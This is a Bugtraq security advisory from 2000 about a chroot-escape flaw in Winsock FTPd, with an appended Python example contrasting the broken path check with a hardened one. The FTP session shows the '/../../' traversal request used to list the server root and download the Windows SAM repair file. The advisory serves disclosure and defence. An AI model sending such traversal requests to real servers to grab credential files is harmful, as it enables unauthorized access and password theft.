Bugtraq mailing list archives
Vulnerability in Winsock FTPD 2.41/3.00 (Pro)
From: Interstellar Overdrive <interdrive () HOME COM>
Date: Mon, 27 Nov 2000 17:21:15 +0200
[ Overdrive Advisory # 1 ]

---------------------------[ Synopsis ]

Subject     : Vulnerability in Winsock ftpd
Application : Winsock FTPd v2.41 RC14, Winsock FTPd v2.41 Pro, Winsock FTPd v3.00 Pro
Platform    : Win32
Description : a local user can break the chroot jail
Date        : 11/28/2000
Author      : Interstellar Overdrive
E-Mail      : overdrive () workspot net
WWW         : http://www.workspot.net/~overdrive/

--------------------------[ Application Info ]

Winsock FTPd is a common, popular ftp server for Windows 95/98/3.11/NT/2K by Texas Imperial Software. It is a simple, inexpensive and easy-to-set-up ftp server for Windows machines; the current release is v3.0.

Homepage : http://www.wftpd.com
Author   : Alun Jones <alun () texis com>

-------------------------[ Overview ]

In Winsock ftpd there is an option called "Restrict to home directory and below", where the server makes a chroot jail for the user. Let's take an example:

-----snip------
c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
ftp>pwd
257 "/" is current directory

#io's directory here c:\wftpd\io
#and it is chroot'ed

ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
my_file.txt
my_code.c
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
ftp>

#until now chroot jail working fine...
#hmmm, lets try doing 'cd /../../'

ftp>cd /../../
250 "/../.." is current directory
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
wftpd
inetpub
DOS
WINA20.386
CONFIG.DOS
CONFIG.SYS
WINNT
AUTOEXEC.BAT
Program Files
TEMP
COMMAND.COM
.....etc

# cool !
#even more fun

ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc

we got the file...
---------snap-------

The problem is that the chroot jail only works if the user tries ../../../, not /../../../. By simply adding a "/" before ../../ (a commonly known bug in win32 applications), any local user, or even an anonymous user, can change his working directory to any directory on the server and download any file from it (as shown above). In other words, the chroot jail is broken.

Vulnerable Winsock FTPd Applications Found :
  Winsock FTPd v2.41 RC14
  Winsock FTPd v2.41 RC14 Pro
  Winsock FTPd v3.00 Pro

-----------------------------[ FIX ]

Vendor contacted. A new release of Wftpd is out which fixes the problem.
  - Wftpd v2.41 RC15
  - Wftpd v3.00 R2
  <http://www.wftpd.com>

-----------------------------[ Credits ]

Interstellar Overdrive (interdrive () home com - overdrive () workspot net)
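The defect described above is a check applied to one spelling of a request ("../..") but not to the other ("/../.."). The example below is added here and is not WFTPD's source: naive_check() is a constructed model of the behaviour the session shows (relative ".." refused with a 501, an absolute request echoed back untouched), and resolve_in_jail() is the fix a server should apply, canonicalising every request against the virtual root before judging it so both spellings travel the same code path. Function names and SAMPLE_REQUESTS are constructed for the illustration; the home directory c:\wftpd\io comes from the session in the advisory.

```python
from typing import List, Optional

# Constructed requests: the three from the advisory's session plus two benign ones.
SAMPLE_REQUESTS = ["../../", "/../../", "/../../WINNT/repair/",
                   "my_code.c", "sub/../my_file.txt"]


def split_segments(path: str) -> List[str]:
    """Split on either separator (a Win32 server accepts both) and drop
    empty and '.' components, so 'a//b/./c' and 'a\\b\\c' read the same."""
    return [s for s in path.replace("\\", "/").split("/") if s not in ("", ".")]


def is_absolute(path: str) -> bool:
    return path.startswith(("/", "\\"))


def naive_check(cwd: str, requested: str) -> Optional[str]:
    """Constructed model of the broken behaviour (not WFTPD code).
    A relative request containing '..' is refused (the 501 case); an absolute
    request is trusted verbatim and never inspected, so '/../..' slips through.
    Returns the new virtual directory, or None when refused."""
    if is_absolute(requested):
        return requested
    if ".." in split_segments(requested):
        return None
    return "/" + "/".join(split_segments(cwd) + split_segments(requested))


def resolve_in_jail(cwd: str, requested: str) -> Optional[str]:
    """Hardened version: normalise first, decide second.
    Absolute requests start from the jail root, relative ones from cwd; every
    '..' pops one segment and popping past the root is refused. Returns the
    canonical virtual path ('/' is the jail root) or None when refused."""
    stack = [] if is_absolute(requested) else split_segments(cwd)
    for seg in split_segments(requested):
        if seg == "..":
            if not stack:
                return None          # would climb above the jail root
            stack.pop()
        elif ":" in seg:
            return None              # 'C:'-style drive prefix has no place inside a jail
        else:
            stack.append(seg)
    return "/" + "/".join(stack)


def to_physical(home_dir: str, virtual: str) -> str:
    """Map a canonical virtual path onto the user's home directory.
    Only ever called with the output of resolve_in_jail(), which has already
    removed every '..', so no traversal can be re-introduced here."""
    segs = split_segments(virtual)
    return home_dir.rstrip("\\/") + ("\\" + "\\".join(segs) if segs else "")


def compare_checks(cwd: str = "/") -> dict:
    """Run both checks over SAMPLE_REQUESTS; returns {request: (naive, fixed)}."""
    return {r: (naive_check(cwd, r), resolve_in_jail(cwd, r)) for r in SAMPLE_REQUESTS}


if __name__ == "__main__":
    for req, (naive, fixed) in compare_checks().items():
        print(f"{req!r:26} naive={naive!r:24} fixed={fixed!r}")
```

Running the block shows the two relevant rows side by side: "../../" is refused by both checks, while "/../../" is accepted by the naive model and refused by resolve_in_jail(). Refusing a climb past the root matches the server's own 501 policy for the relative form; a POSIX chroot would instead clamp ".." at the root to "/", and either is safe as long as the decision is made on the canonical path. The drive-prefix refusal is a Win32 caveat the advisory does not mention: once requests can be absolute, "C:" and UNC prefixes must also be rejected, not just "..".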